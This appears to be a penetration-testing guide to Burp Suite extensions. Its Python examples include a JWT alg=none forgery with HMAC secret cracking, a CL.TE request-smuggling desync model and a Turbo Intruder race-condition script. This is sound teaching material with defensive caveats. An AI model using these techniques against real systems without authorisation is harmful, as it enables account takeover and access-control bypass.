Useful Burp Extensions for Web Security Testing

Burp Suite is the de facto tool for web application security testing. While powerful out of the box, its true potential is unlocked through extensions. These plugins enhance scanning, automate reconnaissance, detect logic flaws, and help uncover vulnerabilities that passive and active scanners often miss.

This guide covers a curated list of must-have Burp extensions for penetration testers and bug bounty hunters, focusing on practical utility and integration into real-world workflows.

Autorize

Detects authorization flaws (broken access control, IDOR) by replaying a high-privilege user's traffic with a low-privilege session and comparing the responses.

  • Paste the low-privilege user's session cookie (or any other session header) into the Autorize configuration tab and enable the extension.
  • Browse the application as the high-privilege user (e.g. an admin).
  • Autorize replays every proxied request with the low-privilege session and marks each one Bypassed!, Enforced!, or Is enforced??? (undecided).

Tick the "unauthenticated" option to also replay every request with no session at all, which surfaces authentication bypasses. The verdict rests on comparing status codes and response lengths, so configure the enforcement detector with the application's real "access denied" fingerprint (status code, header or body string); otherwise an application that answers forbidden requests with a 200 error page will look bypassed, and one that returns personalised 200 pages of differing length will look enforced.
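The replay-and-compare loop described above, as an added example that is not Autorize's own code: a constructed toy application with one correctly protected endpoint and one IDOR is replayed with the admin session, a low-privilege session and no session, and each replay is classified the way Autorize colours its table. The application, the session store, the cookie values and the "access denied" fingerprint are all assumptions made for the demo.

```python
from collections import namedtuple

Response = namedtuple("Response", "status body")

# Constructed session store: cookie value -> (username, role)
SESSIONS = {
    "sess-admin-111": ("alice", "admin"),
    "sess-user-222": ("bob", "user"),
}

# Constructed user records, keyed by numeric id
USERS = {1: "alice", 2: "bob"}


def toy_app(method, path, cookie):
    """Constructed target. /admin/users checks the role correctly;
    /api/users/<id>/profile only checks that *some* session exists (IDOR)."""
    identity = SESSIONS.get(cookie)
    if identity is None:
        return Response(401, "login required")
    user, role = identity
    if path == "/admin/users":
        if role != "admin":
            return Response(403, "access denied")
        return Response(200, "all users: " + ",".join(USERS.values()))
    if path.startswith("/api/users/") and path.endswith("/profile"):
        uid = int(path.split("/")[3])
        # Deliberate bug: never verifies that USERS[uid] == user
        return Response(200, "profile of " + USERS[uid])
    return Response(404, "not found")


def is_enforced(resp, denied_fingerprint):
    """Enforcement detector: the replay counts as blocked when the status
    or the body matches what the app returns for a forbidden request."""
    return resp.status in (401, 403) or denied_fingerprint in resp.body


def classify(original, replayed, denied_fingerprint="access denied"):
    """Autorize's three verdicts: matches the denial fingerprint -> Enforced!,
    same status and length as the admin's response -> Bypassed!,
    anything else -> Is enforced??? (needs a human look)."""
    if is_enforced(replayed, denied_fingerprint):
        return "Enforced!"
    if replayed.status == original.status and len(replayed.body) == len(original.body):
        return "Bypassed!"
    return "Is enforced???"


def autorize_replay(requests, admin_cookie, user_cookie):
    """Replay each admin request as the low-priv user and unauthenticated."""
    results = []
    for method, path in requests:
        original = toy_app(method, path, admin_cookie)
        low = toy_app(method, path, user_cookie)
        anon = toy_app(method, path, None)
        results.append((path, classify(original, low), classify(original, anon)))
    return results


# Constructed "browse as admin" traffic
ADMIN_TRAFFIC = [("GET", "/admin/users"), ("GET", "/api/users/1/profile")]

if __name__ == "__main__":
    for path, low_verdict, anon_verdict in autorize_replay(ADMIN_TRAFFIC, "sess-admin-111", "sess-user-222"):
        print("%-25s low-priv: %-15s unauth: %s" % (path, low_verdict, anon_verdict))
```

The IDOR endpoint shows up as Bypassed! because the low-privilege replay returns the admin's exact response; the admin listing is Enforced! for both replays. The undecided verdict is what you get when the fingerprint is wrong or the page is personalised, which is why configuring the enforcement detector matters.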

Sharpener

Improves usability in Repeater and Intruder by enhancing nested tab management.

  • Copy and paste styles between tabs.
  • Customize tab appearance for better workflow organization.
  • Access via the dropdown arrow (v) on any tab.

Param Miner

Discovers hidden parameters, headers, and cookies that the application reacts to but never advertises, a common precursor to web cache poisoning and information disclosure. It works by sending candidate names in batches and diffing the response against a baseline, so a noisy or rate-limited target needs the thread count and wordlist trimmed.

Usage: Right-click a request -> Extensions -> Param Miner -> "Guess (cookies | headers | parameters)".

Highly effective during recon and API testing phases.

JWT Editor

Adds first-class support for JSON Web Tokens (JWS and JWE).

  • Detects JWTs in requests and responses and adds a "JSON Web Token" tab to the message editor for decoding and live editing.
  • Signs and encrypts edited tokens with keys you import or generate (RSA, EC, OKP, symmetric).
  • One-click attacks for the classic signature bypasses: none algorithm, HMAC key confusion (re-signing an RS256 token with HS256 using the server's public key), embedded JWK, and weak HMAC secret brute force.

Keys are managed in the "JWT Editor Keys" tab that the extension adds to Burp's main tab bar. Editing claims is only half the test: after each modification, check whether the server still accepts the token, since a verifier that pins the algorithm and key rejects every one of these attacks.
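Two of the attacks listed above, reproduced with the standard library as an added example (this is not JWT Editor's code). A verifier that trusts the token's own alg header accepts a token re-signed with alg=none; a verifier that pins HS256 and compares in constant time does not. The weak-secret check re-signs the token with each candidate from a constructed wordlist. The secret, the claims and the wordlist are constructed for the demo; key confusion is omitted because it needs the server's real RSA public key.

```python
import base64
import hashlib
import hmac
import json


def b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj):
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header, payload, secret):
    signing_input = encode_part(header) + "." + encode_part(payload)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def weak_verify(token, secret):
    """Vulnerable: the algorithm is taken from the untrusted header."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))      # no signature check at all
    expected = hmac.new(secret.encode(), (h + "." + p).encode(), hashlib.sha256).digest()
    if b64url(expected) == s:                     # also not constant-time
        return json.loads(b64url_decode(p))
    return None


def strict_verify(token, secret):
    """Hardened: algorithm pinned server-side, constant-time comparison."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), (h + "." + p).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), s):
        return None
    return json.loads(b64url_decode(p))


def forge_none(token, new_claims):
    """What the "none" attack does: rewrite alg, replace claims, drop the signature."""
    return encode_part({"alg": "none", "typ": "JWT"}) + "." + encode_part(new_claims) + "."


def crack_hs256(token, wordlist):
    """Weak-secret check: re-sign with each candidate and compare signatures."""
    h, p, s = token.split(".")
    for candidate in wordlist:
        sig = hmac.new(candidate.encode(), (h + "." + p).encode(), hashlib.sha256).digest()
        if hmac.compare_digest(b64url(sig), s):
            return candidate
    return None


SECRET = "secret1"                                   # constructed weak secret
WORDLIST = ["password", "changeme", "secret1", "jwtsecret"]  # constructed


def demo():
    token = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "bob", "role": "user"}, SECRET)
    forged = forge_none(token, {"sub": "bob", "role": "admin"})
    return {
        "weak_accepts_none": weak_verify(forged, SECRET),
        "strict_accepts_none": strict_verify(forged, SECRET),
        "cracked_secret": crack_hs256(token, WORDLIST),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The forged token is accepted by weak_verify with role=admin and rejected by strict_verify; the wordlist recovers the HMAC secret, after which any claims can be signed legitimately. JWT Editor's "none" and "Weak HMAC secret" attacks automate exactly these two steps against the token in Repeater.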

Collaborator Everywhere

Enhances detection of out-of-band vulnerabilities (e.g., SSRF, blind XSS, DNS exfiltration) by seeding payloads into traffic you are already generating.

  • Injects Collaborator payloads into headers that back-end systems commonly consume (e.g., X-Forwarded-Host, X-Forwarded-For, Referer, Contact) on every in-scope request.
  • No manual setup required: mark the target in scope and browse.
  • Interactions (DNS, HTTP, SMTP) are reported as issues on the Dashboard.

Requires Burp Collaborator, i.e. Burp Suite Professional. "Non-invasive" means request bodies are left alone, but the injected Host-style headers can still change how caches and reverse proxies route a request, so review the proxy history if the application starts misbehaving.

Upload Scanner

Automates detection of file upload vulnerabilities.

  • Uploads a large set of crafted files through the selected upload request: web shells in several server-side languages, polyglot images, SVG and XML documents carrying XXE and SSRF payloads, and filenames with path-traversal sequences.
  • Then tries to fetch each uploaded file to confirm whether it was stored, served with a dangerous MIME type, or executed, and reports the result.

Caveat: it really does write files to the target, and some modules (ImageTragick, XXE) can stall or crash an image-processing back end; choose modules deliberately and clean up after the engagement.

HTTP Request Smuggler

Designed to detect and exploit HTTP Request Smuggling (desync) vulnerabilities between a front-end and its back-end.

  • Probes for CL.TE, TE.CL and related variants, including the HTTP/2-downgrade cases, using timing-based detection that avoids poisoning other users' requests.
  • Handles the fiddly parts for you: Content-Length arithmetic, chunk encoding, and the header obfuscations that make one parser honour Transfer-Encoding while the other ignores it.

Usage: Right-click request -> Extensions -> HTTP Request Smuggler -> "Smuggle probe" (or "Launch all scans"), then check the extension's output tab and the Dashboard issues.

Caveat: a confirmed desync is shared state on the front-end connection pool, so an exploit attempt (as opposed to a probe) can hijack other users' requests; confirm on a dedicated host or with the client's knowledge.
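A model of the CL.TE case, as an added example that is not the extension's code. The same bytes are parsed twice: a front-end that honours Content-Length sees one clean request, a back-end that honours Transfer-Encoding stops at the zero-length chunk and leaves the remainder unread, and that remainder becomes the prefix of the next request on the connection. The probe function reproduces the timing check the extension relies on: the front-end forwards only Content-Length bytes, and if the back-end's chunk parser cannot finish it keeps waiting. Host name and request bytes are constructed for the demo.

```python
def split_request(raw):
    """Split raw bytes into (request line, lowercased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def frontend_cl(raw):
    """Front-end view: the body is exactly Content-Length bytes; anything
    after that would be treated as the start of the next request."""
    request_line, headers, body = split_request(raw)
    n = int(headers[b"content-length"])
    return request_line, body[:n], body[n:]


def backend_te(raw):
    """Back-end view: read chunks until the zero-length chunk. Raises
    ValueError when the buffer ends before the body is complete, i.e. the
    back-end would sit waiting for more data (the timing signal)."""
    request_line, headers, body = split_request(raw)
    if headers.get(b"transfer-encoding") != b"chunked":
        raise ValueError("not chunked")
    decoded, pos = b"", 0
    while True:
        line_end = body.index(b"\r\n", pos)          # ValueError if truncated
        size = int(body[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            if body[pos:pos + 2] != b"\r\n":
                raise ValueError("missing final CRLF")
            return request_line, decoded, body[pos + 2:]
        if len(body) < pos + size + 2:
            raise ValueError("chunk truncated")
        decoded += body[pos:pos + size]
        pos += size + 2


def build(method_path, host, body, content_length=None, chunked=False):
    """Assemble a request; Content-Length defaults to the real body size."""
    cl = len(body) if content_length is None else content_length
    head = b"%s HTTP/1.1\r\nHost: %s\r\n" % (method_path, host)
    if chunked:
        head += b"Transfer-Encoding: chunked\r\n"
    head += b"Content-Length: %d\r\n\r\n" % cl
    return head + body


def clte_timing_probe(raw):
    """CL.TE detection: forward only Content-Length bytes to the back-end;
    True means its chunk parser cannot finish and the request would hang."""
    _, forwarded, _ = frontend_cl(raw)
    head = raw[:raw.index(b"\r\n\r\n") + 4]
    try:
        backend_te(head + forwarded)
        return False
    except ValueError:
        return True


def clte_desync(attack, victim):
    """CL.TE exploitation: bytes the back-end leaves unread are prepended to
    the next request on the connection. Returns the request line the
    back-end processes for the victim."""
    _, _, leftover = backend_te(attack)
    victim_line, _, _ = split_request(leftover + victim)
    return victim_line


HOST = b"target.example"   # constructed
# Probe: front-end forwards 4 bytes "1\r\nA"; back-end waits for the next chunk.
PROBE = build(b"POST /", HOST, b"1\r\nA\r\nX", content_length=4, chunked=True)
# Attack: front-end sees one complete body; back-end's body ends at "0\r\n\r\n"
# and the trailing bytes (an unterminated request) wait for the victim.
SMUGGLED = b"GET /admin HTTP/1.1\r\nX-Ignore: "
ATTACK = build(b"POST /", HOST, b"0\r\n\r\n" + SMUGGLED, chunked=True)
VICTIM = build(b"GET /home", HOST, b"")

if __name__ == "__main__":
    print("CL.TE probe hangs the back-end:", clte_timing_probe(PROBE))
    print("Victim's request line at the back-end:", clte_desync(ATTACK, VICTIM))
```

The victim's own request line ends up inside the X-Ignore header of the smuggled /admin request, which is the mechanism behind every CL.TE exploit the extension builds; the timing probe is safe to run because the front-end never sees a second request in the buffer.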

Reflected Parameters

Monitors traffic for parameter values (longer than 3 characters) that come back in the response body, a first indicator of XSS, open redirect, and SSRF vectors. Reflection on its own is not a vulnerability; the context the value lands in (HTML text, attribute, JavaScript string, URL) decides what, if anything, is exploitable.

  • Tracks Proxy and crawler (formerly Spider) requests.
  • Send findings to Scanner, Repeater, or Intruder.
  • Option to scan all or specific reflected parameters.

ActiveScan++

Extends Burp's built-in scanner with additional active and passive checks rather than a new engine.

  • Host header attacks (password reset poisoning, cache poisoning, DNS rebinding).
  • Blind code injection detected via time delays (expression language, Ruby, Perl, Python), XML input handling, and edge-case XSS.
  • Passive checks such as suspicious input transformation and CORS misconfiguration.

Each check adds scan time per insertion point, so enable it for targeted scans rather than leaving it on by default.

Additional Scanner Checks

Adds passive checks for missing or misapplied security headers:

  • HTTP Strict Transport Security (HSTS)
  • X-Content-Type-Options: nosniff
  • X-XSS-Protection
  • Multiple occurrences of security headers
  • Missing HTTP -> HTTPS redirect
  • DOM-based XSS sources and sinks in JavaScript

Treat the X-XSS-Protection result as informational: current browsers no longer ship the XSS auditor it controlled, and enabling it in old browsers introduced its own information leaks, so the modern recommendation is X-XSS-Protection: 0 (or omitting the header) plus a Content Security Policy. The remaining checks are cheap configuration hygiene that reduces attack surface.
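The passive checks above, run over constructed responses as an added example (not the extension's code). The response strings, the header set and the finding text are assumptions; the one deliberate departure from older checkers is that X-XSS-Protection is flagged when it is set to anything other than 0, not when it is absent.

```python
from collections import Counter

SECURITY_HEADERS = {
    "strict-transport-security", "x-content-type-options", "x-xss-protection",
    "x-frame-options", "content-security-policy",
}


def parse_response(raw):
    """Return (status code, list of (lowercased name, value)) from a raw response."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers


def header_checks(url, raw):
    """Passive checks on one response; returns a list of finding strings."""
    status, headers = parse_response(raw)
    counts = Counter(name for name, _ in headers)
    values = dict(headers)
    https = url.lower().startswith("https://")
    findings = []
    # HSTS is only honoured over HTTPS, so only report it there.
    if https and "strict-transport-security" not in counts:
        findings.append("missing Strict-Transport-Security")
    if values.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    xss = values.get("x-xss-protection")
    if xss is not None and not xss.startswith("0"):
        findings.append("legacy X-XSS-Protection value '%s': set it to 0 or remove it" % xss)
    # Duplicated security headers: browsers may pick either value or ignore both.
    for name in sorted(SECURITY_HEADERS):
        if counts[name] > 1:
            findings.append("%s appears %d times" % (name, counts[name]))
    # A plain-HTTP response should be a redirect to the HTTPS origin.
    if not https and not (status in (301, 302, 307, 308)
                          and values.get("location", "").startswith("https://")):
        findings.append("no HTTP -> HTTPS redirect")
    return findings


# Constructed responses
WEAK = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
        "X-XSS-Protection: 1; mode=block\r\n"
        "X-Frame-Options: DENY\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n<html>")
HARDENED = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
            "X-Content-Type-Options: nosniff\r\nX-XSS-Protection: 0\r\n"
            "X-Frame-Options: DENY\r\n\r\n<html>")
PLAIN_HTTP = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>"
REDIRECT = "HTTP/1.1 301 Moved Permanently\r\nLocation: https://app.example/\r\n\r\n"

if __name__ == "__main__":
    for url, raw in [("https://app.example/", WEAK), ("https://app.example/", HARDENED),
                     ("http://app.example/", PLAIN_HTTP), ("http://app.example/", REDIRECT)]:
        print(url, header_checks(url, raw) or "clean")
```

The hardened response produces no findings; the weak one reports missing HSTS and nosniff, the legacy X-XSS-Protection value and the duplicated X-Frame-Options, which is the same set of issues the extension raises in the Dashboard.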

Turbo Intruder

For high-speed or complex attacks that the standard Intruder is too slow or too rigid for.

  • Sends thousands of requests per second, driven by a short Python script you write in the extension's window.
  • Supports connection reuse, pipelining, HTTP/2, and the single-packet attack, which holds back the final bytes of many queued requests and releases them together.
  • Ideal for race conditions, brute force, and large payload testing.
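A Turbo Intruder script for the race-condition case, as an added example that is not one of the extension's bundled scripts: it queues several copies of the selected request (say, redeeming a single-use discount code) behind a gate and releases them as a single packet. Turbo Intruder injects target, wordlists, table, RequestEngine and Engine into the script namespace at run time; the gate name, the attempt count and the success marker are assumptions for the demo.

```python
# Paste into the Turbo Intruder window with the "redeem code" request selected.

SUCCESS_MARKER = "Code applied"   # assumed body text of a successful redemption
ATTEMPTS = 20                     # copies of the request to race


def classify(status, body, marker=SUCCESS_MARKER):
    """Label one response: 'applied' means the limit was passed."""
    if status == 200 and marker in body:
        return "applied"
    if status in (400, 409, 429):
        return "rejected"
    return "other"


def count_wins(responses, marker=SUCCESS_MARKER):
    """Number of (status, body) pairs that got past the single-use check.
    More than one 'applied' from one gate release means the check is racy."""
    return sum(1 for status, body in responses if classify(status, body, marker) == "applied")


def queueRequests(target, wordlists):
    # Engine.BURP2 speaks HTTP/2 and performs the single-packet attack: each
    # request queued behind the gate is sent except for its tail, and the tails
    # are released together when the gate opens, so every copy reaches the
    # server at the same instant and network jitter no longer decides the race.
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)
    for _ in range(ATTEMPTS):
        engine.queue(target.req, gate='race1')   # held until openGate
    engine.openGate('race1')                     # fire all copies at once


def handleResponse(req, interesting):
    # Show every response; sort the table by length or grep for the marker
    # to see how many redemptions went through.
    table.add(req)
```

After the run, count the rows containing the success marker; count_wins does the same tally if you export the responses. One win is expected, two or more is the finding. Keep ATTEMPTS small on a production target, since each win is a real state change.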

Java Deserialization Scanner

Detects Java deserialization vulnerabilities (e.g., serialized objects carried in cookies, hidden form fields, or API calls).

  • Passive check: flags values that begin with the serialized-stream magic bytes (0xAC ED 00 05 raw, rO0AB when base64-encoded).
  • Active check: sends time-delay payloads for known gadget libraries (generated with ysoserial, whose jar you point the extension at) and watches for the sleep.
  • Manual testing via a dedicated tab (Intruder-like interface) for trying individual gadget chains.

A working gadget chain executes code on the target, so treat a positive active result as live RCE and stop at proof rather than firing further payloads.

JSpector

Repository: github.com/hisxo/JSpector

Passively inspects every JavaScript file that passes through the proxy to extract:

  • Hidden endpoints and API routes
  • Hardcoded secrets
  • Dangerous functions (e.g., eval(), document.write())

Automatically creates issues in Burp, improving visibility into the client-side attack surface. Expect noise from bundled third-party libraries; confirm that a flagged endpoint belongs to the target before reporting it.

BurpGPT

Repository: github.com/aress31/burpgpt

Integrates OpenAI's GPT models into Burp's passive scanner.

  • Sends request/response pairs to the model and reports what it returns as scanner issues.
  • Aims at bespoke issues that signature-based scanners miss, such as business logic flaws.
  • Customizable prompts for targeted analysis.

Two caveats before enabling it on a client engagement: every in-scope request and response is transmitted to a third-party API, which most scopes and NDAs do not permit without sign-off, and the output is a model's opinion, so treat each finding as a lead to verify rather than a result.

ReconAIzer

Repository: github.com/hisxo/ReconAIzer

Leverages OpenAI (GPT) to accelerate reconnaissance.

  • Suggests endpoints, parameters, subdomains, and URLs inferred from the JavaScript and responses you send it.
  • Automates note-taking and hypothesis generation from what has been observed.
  • Helps map the full attack surface faster.

The same data-handling caveat as BurpGPT applies: target traffic leaves your machine, and a suggested endpoint is a guess until you have confirmed it exists.


Published on Aug 20, 2025